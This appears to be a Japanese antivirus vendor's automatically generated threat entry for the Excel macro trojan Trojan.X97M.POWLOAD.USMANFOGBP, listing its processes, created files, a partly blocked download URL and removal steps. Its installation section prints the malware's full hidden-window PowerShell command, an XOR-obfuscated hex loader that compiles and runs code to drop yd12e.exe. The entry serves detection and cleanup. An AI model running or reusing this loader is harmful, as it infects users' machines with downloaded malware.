Trojan.X97M.POWLOAD.USMANFOGBP
Troj/DocDl-WLZ (Sophos)
Windows
マルウェアタイプ:
トロイの木馬型
破壊活動の有無:
なし
暗号化:
感染報告の有無 :
はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のプロセスを追加します。
- powershell -WindowStyle Hidden function u92da {param($ydbfa)$obf93b='g8596a4';$b25d926='';for ($i=0; $i -lt $ydbfa.length;$i+=2){$tce886b=[convert]::ToByte($ydbfa.Substring($i,2),16);$b25d926+=[char]($tce886b -bxor $obf93b[($i/2)%$obf93b.length]);}return $b25d926;} $af5677 = '124b5c575141671e4b415c5b5a4114515b5e16324d144c5054183341094c5c54534f7d094c504b591167024a43505504475c4d46505806143441464d530c1a2351545e580e471351564a0d14470e565219651847135d58177f2e0f124b5c575141671e4b415c5b4f7a024c0e343c114105545c5a160258064b46195157565e5c4e62720d582e55455644151c4553504b580458540a1715730f40154165565f0f405a1a725c423146085b745d521351144b17106b4144125a5950554147135941505541511f4c504b58417d094c654d44414c52090c0f02551c2e564169421314035d000a010018144c47505806140059540055581d5c6371555a28591757474d1e435f024a5b5c5a52064514157c5815461e685a505815145a1817755900502b51574b57134d451168194614560b51561945155513515619531940024a5b197f0f40374c47195d530d520d530a1e124015515b5e160e51500b040d1f5a6f235459705b115b154c1d1b5d0446095d590a044318477d5b4d44186408515b4d0b43620e4a414c570d641557415c5515164e6515494303580e5b154a4200400e5b155c4e15511556155b590e58475457585704054f715b4d6615464740540d0353054b6d7c5742314015185f5d57570c5e0a191943085a131840010557500214155643151412515b4d1612055601535a54480f3c7c59557f0c44084a4111142a511556505505531a0354591b1a4171094c4740660e5d094c081b6415582a57435c7b0459084a4c1b1a4167024c7958451571154a5a4b0b07550b4b50106b4147135941505541511f4c504b58414208515119510455045c03117f0f40374c471955025503011970581564134a15510e04005f145c5742414e5e5b500057571d5c48405b5a0857474b415842085747515b4d161302510107111f1a7d094c654d444142525a060a02410947530700035452541040000405554f1a050f035400510d05080e51015200055b14481d5c515311405456540b01040b285a1368414b183b5115571c42510e400818470b5005065c457c5742314015185d5c5456505101084103500d510c0111405456540b011543580603591d1b045701520c030c065701570a000c065803060c050c505404570c010f14481d5c5153115e0456505c03000b5c7d094c654d444f6e024a5a104d065b1357154b0407505503486c7f0f40374c4719420000010b0d5c0b49612e56416942131d52034050581514020b545a035c045c515311170d56065950081e0951050f510f0f4d40060c530a0e0418574001091a0e411318500a5702014e114e5e59155b474a075f52530f1a7a4c4d533a69474d56005307091c084d0a074d041f5e531506190d57450e70581564134a155c025902540906047b0046145054551820580b575671710d5b0559591105480f2a59474a5e0058497b5a494f49410401505f1a5118020c0d0f0550074b0b1c02510455045c031158044347715b4d6615464f50505b0105025e1661567f0f40510c1d101d514c5708045b1f4d515300030a07521854110e4b0407505502156e5303770b5150574241575f0c000a000209095d421961045624545c5c58151c4e03464d44085a00185e5a0455015a7d5b4f5f135b09555057424f73024c73565a05511568544d5e4971094e5c4b590f590256411765115104515455700e58035d47177711440b51565842085b097c544d57481f45646940525006021a1e4c0f53500610170d0f5450535c005a14480f0400010c055757497c5a4e580d5b065c73505a041c1201075d574916575e015a0250005e08560d535056560f000c035901510c05090e5405560c040f03020003090c095054055608040e0253005e0957090454565701015a035101500c070d535504575e005d035901040c000d535656540d025a0151020508020d505405565e005d1448180c5b070d03480f374a5a5a531247344c544b42285a0157155357570605055b5c4141641557565c4512671359474d7f0f5208105e5a0455014e03654b590251144b1b6a42004613105f580053564e03475c421446091805024b114105545c5a161240064c5c5a16124015515b5e16140d555c54114515460e56521947025155001c424515460e565219520401540f540414060c5201035802430f144c47505806140c0a0c0c0307075a6b414b5f0f53497d584942180f015747115f0f40475108090d0808165b500b0e4f780256524d5e5a5d4c0507104d034d135d154103500d510c0104750e5a115d474d18355b2541415c1e1057020a0d17651456144c475058061c0e1407101a50024e035e0b0f5401010b1e041e025c064a1c114e54055e0e010d163f14035d000a01006f4f511a0b1f4111475c500c0556554974505751155c3a110e44440440124a5b195d530d520d530a0d1c49'; $af56772 = u92da($af5677); Add-Type -TypeDefinition $af56772; [g6b9d]::r6692();
- "%Windows%\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"%User Temp%\s_8vkkl0.cmdline"
- %Application Data%\yd12e.exe
- %Windows%\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%User Temp%\RESBEDC.tmp" "%User Temp%\CSCBEBC.tmp"
- "%Application Data%\yd12e.exe"
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
作成活動
マルウェアは、以下のファイルを作成します。
- %User Temp%\s_8vkkl0.dll
- %User Temp%\s_8vkkl0.cmdline
- %System Root%\BVTBin\Tests\installpackage\csilogfile.log
- %User Temp%\s_8vkkl0.pdb
- %User Temp%\s_8vkkl0.err
- %Application Data%\yd12e.exe
- %User Temp%\15713820.od
- %User Temp%\s_8vkkl0.0.cs
- {malware file path and name}
- %User Temp%\s_8vkkl0.out
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %System Root%フォルダは、オペレーティングシステム(OS)が存在する場所で、いずれのOSでも通常、 "C:" です。.. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
その他
マルウェアは、以下の不正なWebサイトにアクセスします。
- http://{BLOCKED}es.it/new/wp-content/themes/ORDER1.exe
このウイルス情報は、自動解析システムにより作成されました。
対応方法
手順 1
Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
「Trojan.X97M.POWLOAD.USMANFOGBP」で検出したファイル名を確認し、そのファイルを終了します。
- すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
- 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
セーフモードについては、こちらをご参照下さい。 - 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。
手順 3
以下のファイルを検索し削除します。
- %User Temp%\s_8vkkl0.dll
- %User Temp%\s_8vkkl0.cmdline
- %System Root%\BVTBin\Tests\installpackage\csilogfile.log
- %User Temp%\s_8vkkl0.pdb
- %User Temp%\s_8vkkl0.err
- %Application Data%\yd12e.exe
- %User Temp%\15713820.od
- %User Temp%\s_8vkkl0.0.cs
- {malware file path and name}
- %User Temp%\s_8vkkl0.out
手順 4
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.X97M.POWLOAD.USMANFOGBP」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
ご利用はいかがでしたか? アンケートにご協力ください